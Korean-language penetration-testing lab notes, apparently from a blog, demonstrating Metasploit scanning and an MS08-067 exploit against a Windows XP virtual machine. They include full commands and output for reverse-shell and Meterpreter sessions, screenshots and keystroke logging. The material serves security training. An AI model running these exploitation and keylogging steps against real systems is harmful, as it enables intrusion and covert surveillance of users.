모의 해킹/작업중 2016.01.24 11:37

02. Metasploit Tool을 이용한 스캐닝 및 공격



 - 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구

 - 외부 모듈인 취약점 점검, 포트 스캐너 등의 사용이 가능하고, DB 저장 가능

 - 정보 수집 및 공격 모듈 사용시 간편하게 진행 가능

 - msfconsole 내에서 외부 명령어 사용(리눅스 명령어) 가능

 - 리눅스에서 실행하는 공격 툴 관련 실행 내용들을 Metaploit에서 실행하여 결과를 저장할 수 있음



1. Metasploit DB 연결


# /etc/init.d/postgresql star    Postgres SQL 시작

# su postgres                    DB 관리자 변경

$ createuser msf1 -P           DB 계정 생성 및 패스워드 설정(만약, 삭제할 경우 $ dropuser msf1)


passwd : msf1



$ createdb --owner=msf1 msf1_db                              사용자 데이터베이스 생성

$ exit                                                              원래 계정으로 나가기


# msfconsole                        metasploit 콘솔 도구 실행


msf> help                               metasploit 명령어 도움말

msf> db_status                                   DB 연결 확인

msf> db_connect msf1:패스워드@localhost:5432/msf1_db      DB 연결 


 - 한번 사용한 묘듈은 남아 있기때문에, 다음에 사용할때 빠름 

 - 만약, 해지할려면, 'db_disconnect' 명령어 사용


msf> db_status


msf> search scanner

msf> use scanner_name

msf> back

msf> exit


 

[참고] 모듈 Rank 의미


Rank

                        성공  실패

normal 정보 수집 50   :  50

greas      정보 수집 70   :  30

excellent  정보 수집 90   :  10




2. MSF 에서 외부 명령어와 내부 명령어 차이점


Ex1) 외부 명령어를 사용할 수 있음, 단 DB에 저장안됨


msf > nmap -sS 172.16.4.254 -v

[*] exec: nmap -sS 172.16.4.254 -v



Ex2) msf 내부 nmap 명령어 실행, DB에 저장됨


msf> db_nmap -sS -A -p 8080 172.16.4.254

[*] exec: <--- 안나옴

msf> help

msf > hosts      DB에 기록된 목록 확인



Hosts

=====


address       mac  name  os_name  os_flavor  os_sp  purpose  info  comments

-------       ---  ----  -------  ---------  -----  -------  ----  --------

172.16.4.254             Linux                      server   



msf > services DB에 기록된 해당 타켓에 대한 서비스 상태 확인


Services

========


host          port  proto  name        state     info

----          ----  -----  ----        -----     ----

172.16.4.254  8080  tcp    http-proxy  filtered  




3. Metasploit 용어


 - Exploit : 시스템, 애플리케이션, 서버등의 취약점을 악용하는 방법, SQL Injection, Buffer Overflow 등

 - Payload : 시스템에서 실행하고자 하는 코드로 프레임워크에 의해 전달 (Ex : 악성 코드)

 - Shell code : 공격 수행시 수행할때 Payload에 사용되는 명령 집합

 - Module : Metasploit framework에서 사용되는 소프트웨어의 부분




4. msf를 이용한 스케닝


Ex1) idle scanning


 - ISD, IPS를 회피하기 위한 스캐닝 방법

 - 현재 전원이 on 시스템 중에 통신(패켓 생성 X)이 없는 시스템을 찾는 스캐닝 기법 

 - IP 스푸핑까지 같이 적용하여 스캐닝 가능



msf > search scanner      많은 목록이 나옴

msf > search ipidseq      'ipidseq' 목록만 나옴


Matching Modules

================


   Name                          Disclosure Date  Rank    Description

   ----                          ---------------  ----    -----------

   auxiliary/scanner/ip/ipidseq                   normal  IPID Sequence Scanner



msf > use auxiliary/scanner/ip/ipidseq

msf auxiliary(ipidseq) > help

msf auxiliary(ipidseq) > help show

msf auxiliary(ipidseq) > show options


Module options (auxiliary/scanner/ip/ipidseq):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface                인터페이스 설정

   RHOSTS                      yes       The target address range or CIDR identifier     타켓 서브넷 or IP 주소 설정

   RPORT      80               yes       The target port                      타켓 포트 설정

   SNAPLEN    65535            yes       The number of bytes to capture                캡처할 데이터 용량(단위 : Byte)

   THREADS    1                yes       The number of concurrent threads           속도, 번호가 낮으면 느림 

   TIMEOUT    500              yes       The reply read timeout in milliseconds         응답 속도 (낮게 조정 권장)


 - no : 설정 해도 않해도됨 (단, 특정 Inteface만 적용할 경우, 설정해야 함. 모든 인터페이스에 적용할 경우, 설정 패스)

 - yes : 무조건 설정값이 들어가야함


THREADS : 공격 타켓이 많으면, 값을 높게 조정 권장


 - 윈도우 THREADS : 16 (16이상 설정해봤자, 결과값 거의 차이 없음)

 - 리눅스  THREADS : 높게 해도 됨 




msf auxiliary(ipidseq) > set RHOSTS 172.16.0.0/16      '172.16.0.0/16' 서브넷 스켄 

RHOSTS => 172.16.0.0/16


msf auxiliary(ipidseq) > set RPORT 8080              포트 설정

RPORT => 8080


msf auxiliary(ipidseq) > set THREADS 50              쓰레드 설정

THREADS => 50


(삭제할 경우 unset RHOSTS)



msf auxiliary(ipidseq) > show options


Module options (auxiliary/scanner/ip/ipidseq):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface

   RHOSTS     172.16.0.0/16    yes       The target address range or CIDR identifier

   RPORT      8080             yes       The target port

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    50               yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds




msf auxiliary(ipidseq) > run        실행


[*] 172.16.0.1's IPID sequence class : Incremental! 통신 않하고 있는 타켓 (스푸핑할 IP 주소로 선정함)

[*] 172.16.0.50's IPID sequence class : Incremental!

[*] 172.16.0.51's IPID sequence class : Unknown 전원이 off된 타켓


~ 중간 생략 ~

                                                          

msf auxiliary(ipidseq) >  db_nmap -p 8080 -Pn -sI 172.16.0.50 172.16.4.254

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 11:46 KST

[*] Nmap: Idle scan using zombie 172.16.0.50 (172.16.0.50:80); Class: Incremental

[*] Nmap: Nmap scan report for 172.16.4.254

[*] Nmap: Host is up (0.19s latency).

[*] Nmap: PORT     STATE SERVICE

[*] Nmap: 8080/tcp open  http-proxy

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 92.54 seconds


 - Pn : 공격자의 실제 IP 주소를 보이지 않게 하기 위해서 사용함


msf auxiliary(ipidseq) > back

msf >




Ex2) Syn scan


 - 공격 타켓에 대한 포트 상태 여부를 확인하는 스캐닝 방법

 - nmap 처럼 다양한 정보를 스켄할 수 없음 


msf > search portscan


Matching Modules

================


   Name                                              Disclosure Date  Rank    Description

   ----                                              ---------------  ----    -----------

   auxiliary/scanner/http/wordpress_pingback_access                   normal  Wordpress Pingback Locator

   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner

   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner

   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner

   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner

   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner

   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner

   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner



msf > use scanner/portscan/syn 

msf auxiliary(syn) > show options


Module options (auxiliary/scanner/portscan/syn):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   INTERFACE                   no        The name of the interface

   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS                      yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    1                yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds


msf auxiliary(syn) > set PORTS 1-80

PORTS => 1-80


msf auxiliary(syn) > set RHOSTS 172.16.4.254

RHOSTS => 172.16.4.254


msf auxiliary(syn) > set TEREADS 16

TEREADS => 16


msf auxiliary(syn) > show options


Module options (auxiliary/scanner/portscan/syn):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   INTERFACE                   no        The name of the interface

   PORTS      1-80          yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS     172.16.4.254    yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    1                yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds


msf auxiliary(syn) > run


msf auxiliary(syn) > back

msf >



Ex3) smb block scan


 - 윈도우 Net-Bios를 이용하는 스캐닝 방법


msf > search smb_version


Matching Modules

================


   Name                               Disclosure Date  Rank    Description

   ----                               ---------------  ----    -----------

   auxiliary/scanner/smb/smb_version                   normal  SMB Version Detection



msf > use scanner/smb/smb_version 

msf auxiliary(smb_version) > 

msf auxiliary(smb_version) > show options


Module options (auxiliary/scanner/smb/smb_version):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS                      yes       The target address range or CIDR identifier

   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    1                yes       The number of concurrent threads



msf auxiliary(smb_version) > set RHOSTS 172.16.4.0/24

RHOSTS => 172.16.4.0/24


msf auxiliary(smb_version) > set THREADS 16

THREADS => 16


msf auxiliary(smb_version) > show options


Module options (auxiliary/scanner/smb/smb_version):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS     172.16.4.0/24    yes       The target address range or CIDR identifier

   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    16               yes       The number of concurrent threads



msf auxiliary(smb_version) > run


[*] 172.16.4.11:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.10:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.12:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.3:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.18:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.23:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESKJ-PC) (domain:WORKGROUP)

[*] 172.16.4.22:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] Scanned  26 of 256 hosts (10% complete)

[*] Scanned  56 of 256 hosts (21% complete)

[*] Scanned  79 of 256 hosts (30% complete)

[*] Scanned 110 of 256 hosts (42% complete)

[*] Scanned 128 of 256 hosts (50% complete)

[*] Scanned 155 of 256 hosts (60% complete)

[*] Scanned 180 of 256 hosts (70% complete)

[*] Scanned 207 of 256 hosts (80% complete)

[*] Scanned 240 of 256 hosts (93% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(smb_version) > 

msf auxiliary(smb_version) > back

msf >




Ex4) FTP scan


 - FTP 서버 스캐닝 방법


msf > search ftp_version


Matching Modules

================


   Name                               Disclosure Date  Rank    Description

   ----                               ---------------  ----    -----------

   auxiliary/scanner/ftp/ftp_version                   normal  FTP Version Scanner



msf > use scanner/ftp/ftp_version

msf auxiliary(ftp_version) > show options


Module options (auxiliary/scanner/ftp/ftp_version):


   Name     Current Setting      Required  Description

   ----     ---------------      --------  -----------

   FTPPASS  mozilla@example.com  no        The password for the specified username

   FTPUSER  anonymous            no        The username to authenticate as

   RHOSTS                        yes       The target address range or CIDR identifier

   RPORT    21                   yes       The target port

   THREADS  1                    yes       The number of concurrent threads


msf auxiliary(ftp_version) > set RHOSTS 172.16.4.0/24

RHOSTS => 172.16.4.0/24


msf auxiliary(ftp_version) > set THREADS 50

THREADS => 50


msf auxiliary(ftp_version) > show options


Module options (auxiliary/scanner/ftp/ftp_version):


   Name     Current Setting      Required  Description

   ----     ---------------      --------  -----------

   FTPPASS  mozilla@example.com  no        The password for the specified username

   FTPUSER  anonymous            no        The username to authenticate as

   RHOSTS   172.16.4.0/24        yes       The target address range or CIDR identifier

   RPORT    21                   yes       The target port

   THREADS  50                   yes       The number of concurrent threads


msf auxiliary(ftp_version) > run


[*] Scanned  32 of 256 hosts (12% complete)

[*] Scanned  70 of 256 hosts (27% complete)

[*] Scanned  92 of 256 hosts (35% complete)

[*] Scanned 112 of 256 hosts (43% complete)

[*] Scanned 139 of 256 hosts (54% complete)

[*] Scanned 157 of 256 hosts (61% complete)

[*] Scanned 200 of 256 hosts (78% complete)

[*] Scanned 214 of 256 hosts (83% complete)

[*] Scanned 243 of 256 hosts (94% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(ftp_version) > back

msf >




5. Exploit Tools


 - 취약점 발견 -> 공격 실시

 - 공격자 : Kali Linux(192.168.10.134)

 - 공격 타켓 : Win XP(192.168.10.135) -> FTP 서버 플레이 버튼 클릭



Ex1) db_nmap 스캐닝 실시


msf > db_nmap -sS -p 1-500ulns 192.168.10.135

msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135

msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135



msf > db_nmap -sS -p 1-500ulns 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:29 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.0011s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE

[*] Nmap: 21/tcp  open  ftp

[*] Nmap: 25/tcp  open  smtp

[*] Nmap: 80/tcp  open  http

[*] Nmap: 135/tcp open  msrpc

[*] Nmap: 139/tcp open  netbios-ssn

[*] Nmap: 443/tcp open  https

[*] Nmap: 445/tcp open  microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds



msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:25 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.00042s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE      VERSION

[*] Nmap: 21/tcp  open  ftp          EasyFTP Server ftpd

[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)

[*] Nmap: | drw-rw-rw-   1 user     group            0 Jan 24 12:02 . [NSE: writeable]

[*] Nmap: |_drw-rw-rw-   1 user     group            0 Jan 24 12:02 .. [NSE: writeable]

[*] Nmap: |_ftp-bounce: no banner

[*] Nmap: 25/tcp  open  smtp         Microsoft ESMTP 6.0.2600.5512

[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.10.134], SIZE 2097152, PIPELINING, DSN, 

ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,

[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL 

QUIT HELP AUTH BDAT VRFY

[*] Nmap: 80/tcp  open  http         Microsoft IIS httpd 5.1

[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)

[*] Nmap: |_http-server-header: Microsoft-IIS/5.1

[*] Nmap: |_http-title: Site Not Found

[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC

[*] Nmap: 139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn

[*] Nmap: 443/tcp open  https?

[*] Nmap: | http-cisco-anyconnect:

[*] Nmap: |_  ERROR: Not a Cisco ASA or unsupported version

[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Device type: general purpose

[*] Nmap: Running: Microsoft Windows XP

[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3

[*] Nmap: OS details: Microsoft Windows XP SP3

[*] Nmap: Network Distance: 1 hop

[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE: 

cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

[*] Nmap: Host script results:

[*] Nmap: | ms-sql-info:

[*] Nmap: |   \\192.168.10.135\pipe\sql\query:

[*] Nmap: |     Version:

[*] Nmap: |       name: Microsoft SQL Server 2000 RTM

[*] Nmap: |       number: 8.00.194.00

[*] Nmap: |       Product: Microsoft SQL Server 2000

[*] Nmap: |       Service pack level: RTM

[*] Nmap: |       Post-SP patches applied: false

[*] Nmap: |_    Named pipe: \\192.168.10.135\pipe\sql\query

[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC: 

00:0c:29:ab:e2:7a (VMware)

[*] Nmap: | smb-os-discovery:

[*] Nmap: |   OS: Windows XP (Windows 2000 LAN Manager)

[*] Nmap: |   OS CPE: cpe:/o:microsoft:windows_xp::-

[*] Nmap: |   Computer name: with-15b28b4cfd

[*] Nmap: |   NetBIOS computer name: WITH-15B28B4CFD

[*] Nmap: |   Workgroup: WORKGROUP

[*] Nmap: |_  System time: 2016-01-24T14:26:02+09:00

[*] Nmap: | smb-security-mode:

[*] Nmap: |   account_used: guest

[*] Nmap: |   authentication_level: user

[*] Nmap: |   challenge_response: supported

[*] Nmap: |_  message_signing: disabled (dangerous, but default)

[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol

[*] Nmap: TRACEROUTE

[*] Nmap: HOP RTT     ADDRESS

[*] Nmap: 1   0.42 ms 192.168.10.135

[*] Nmap: OS and Service detection performed. Please report any incorrect results at 

https://nmap.org/submit/ .

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds




msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:26 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.00090s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE

[*] Nmap: 21/tcp  open  ftp

[*] Nmap: 25/tcp  open  smtp

[*] Nmap: 80/tcp  open  http

[*] Nmap: 135/tcp open  msrpc

[*] Nmap: 139/tcp open  netbios-ssn

[*] Nmap: 443/tcp open  https

[*] Nmap: 445/tcp open  microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Host script results:

[*] Nmap: | smb-check-vulns:

[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)

                (취약함, 공격 가능, 윈도우6 이후부터는 공격 안됨)


[*] Nmap: |   Conficker: Likely CLEAN

[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

                (취약함)

[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

                (취약함)




Ex2) 공격 모듈 찾기(Payload : windows/shell/reverse_tcp)


msf > search ms08-067


Matching Modules

================


   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service 


Relative Path Stack Corruption


msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting



msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                        yes       The target address

   RPORT    445                  yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting



msf exploit(ms08_067_netapi) > show payloads


Compatible Payloads

===================


   Name                                                Disclosure Date  Rank    Description

   ----                                                ---------------  ----    -----------

   generic/custom                                                       normal  Custom Payload

   generic/debug_trap                                                   normal  Generic x86 Debug Trap

   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP 

Inline

   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP 

Inline

   generic/tight_loop                                                   normal  Generic x86 Tight Loop


~ 중간 생략 ~


Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)

   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse 

TCP Stager

   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse 

All-Port TCP Stager

   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse 

TCP Stager (DNS)

   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse 

TCP Stager (RC4 Stage Encryption)

   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse 

TCP Stager with UUID Support

   windows/shell_bind_tcp                                               normal



 - Payload 상의 Shell은 중간 인터페이스 없이 직접 침투할때 사용함


msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp


msf exploit(ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                       yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting



msf exploit(ms08_067_netapi) > 



msf exploit(ms08_067_netapi) > show targets


Exploit targets:


   Id  Name

   --  ----

   0   Automatic Targeting

   1   Windows 2000 Universal

   2   Windows XP SP0/SP1 Universal

   3   Windows 2003 SP0 Universal

   4   Windows XP SP2 English (AlwaysOn NX)

   5   Windows XP SP2 English (NX)


~ 중간 생략 ~


 47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > set LHOST 192.168.10.134

LHOST => 192.168.10.134


msf exploit(ms08_067_netapi) > set LPORT 8080

LPORT => 8080


msf exploit(ms08_067_netapi) > set RHOST 192.168.10.135

RHOST => 192.168.10.135


msf exploit(ms08_067_netapi) > set target 47

target => 47



msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

   LPORT     8080             yes       The listen port


Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.10.134:8080 

[*] Attempting to trigger the vulnerability...

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (267 bytes) to 192.168.10.135

[*] Command shell session 1 opened (192.168.10.134:8080 -> 192.168.10.135:1078) at 2016-01-24 

15:19:10 +0900


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig



Windows IP Configuration



Ethernet adapter ���� ���� ����:


        Connection-specific DNS Suffix  . : localdomain

        IP Address. . . . . . . . . . . . : 192.168.10.135

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 192.168.10.2


C:\WINDOWS\system32>

C:\WINDOWS\system32>^C  (ctrl+c)

Abort session 1? [y/N]  y


[*] 192.168.10.135 - Command shell session 1 closed.  Reason: User exit

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > back

msf > 


 - 공격 실행시 바로 공격 타켓 시스템의 명령창으로 접속된다.

 - BOF 등의 유사 공격으로 접속 된 상태이므로 명령 창 내 버그가 존재하기 때문에 일부 명령어는 사용을 못한다.




Ex3) 공격 모듈 찾기(Payload : meterpreter/reverse_tcp)


msf > search ms08-067


Matching Modules

================


   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service 

Relative Path Stack Corruption




msf > use windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

   LPORT     8080             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



set umsf exploit(ms08_067_netapi) > unset PAYLOAD

Unsetting PAYLOAD...


shmsf exploit(ms08_067_netapi) > show payloads


Compatible Payloads

===================


   Name                                                Disclosure Date  Rank    Description

   ----                                                ---------------  ----    -----------

   generic/custom                                                       normal  Custom Payload


~ 중간 생략 ~


   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective 

Injection), Reverse TCP Stager

   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective 

Injection), Reverse All-Port TCP Stager

   windows/meterpreter/reverse_tcp_dns         



msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp 

payload => windows/meterpreter/reverse_tcp


msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

   LPORT     8080             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > exploit 


[*] Started reverse handler on 192.168.10.134:8080 

[*] Attempting to trigger the vulnerability...

[*] Sending stage (885806 bytes) to 192.168.10.135

[*] Meterpreter session 2 opened (192.168.10.134:8080 -> 192.168.10.135:1082) at 2016-01-24 15:49:27 +0900


meterpreter > shell

Process 2488 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>


C:\WINDOWS\system32>ipconfig


Windows IP Configuration


Ethernet adapter ���� ���� ����:


        Connection-specific DNS Suffix  . : localdomain

        IP Address. . . . . . . . . . . . : 192.168.10.135

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 192.168.10.2


C:\WINDOWS\system32>

C:\WINDOWS\system32>^Z (ctrl+z)

Background channel 1? [y/N]  y

[-] Error running command shell: ThreadError can't be called from trap context


meterpreter >




Ex4) 타겟 시스템 정보 확인 및 프로세스 확인


meterpreter > sysinfo       타겟 시스템 정보 확인

meterpreter > ps              타겟 시스템에서 실행 중인 프로세스 출력




Ex5) 타겟 시스템 화면 스크린샷 


meterpreter > screenshot 타겟 시스템 화면 스크린샷 실시

Screenshot saved to: /root/prTcNwSY.jpeg


 - GUI 기반으로 root 홈 디렉토리 스크린샷 확인




Ex6) 타겟 시스템 키-로그 


 - win xp에서 메모장 열기 실시


meterpreter > ps             Win XP 메모장 PID 번호 확인


 2944  notepad.exe        x86   0        WITH-15B28B4CFD\admin                 C:\WINDOWS\system32\notepad.exe


meterpreter > migrate 2944 타겟 시스템 키-로그 기능

[*] Migrating from 1072 to 2944...

[*] Migration completed successfully.



meterpreter > run post/windows/capture/keylog_recorder


 - win xp에서 메모장에 문자 입력 실시


안녕하세요 타겟입니다.


Hello Hi



meterpreter > run post/windows/capture/keylog_recorder


[*] Executing module against WITH-15B28B4CFD

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt

[*] Recording keystrokes...


(ctrl+c)


^C[*] Saving last few keystrokes...

[*] Interrupt 

[*] Stopping keystroke sniffer...

meterpreter > 



root@kali:~# ls -la /root/.msf4/loot

합계 12

drwxr-xr-x 2 root root 4096  1월 24 16:33 .

drwxr-xr-x 8 root root 4096  1월 24 10:01 ..

-rw-r--r-- 1 root root  193  1월 24 16:33 20160124163330_default_192.168.10.135_host.windows.key_308141.txt



root@kali:~# cat /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt

Keystroke log started at 2016-01-24 16:33:30 +0900

dkssu <Back>  <Back>  <Back>  <Back>  <Back> 

ssudpdy rptt <Back> dlqsl <Return>  <Return> 

ello <Back>  <Back>  <Back>  <Back>  <Back> Ho H 




Ex6) 타겟 시스템 프로그램 강제 종료


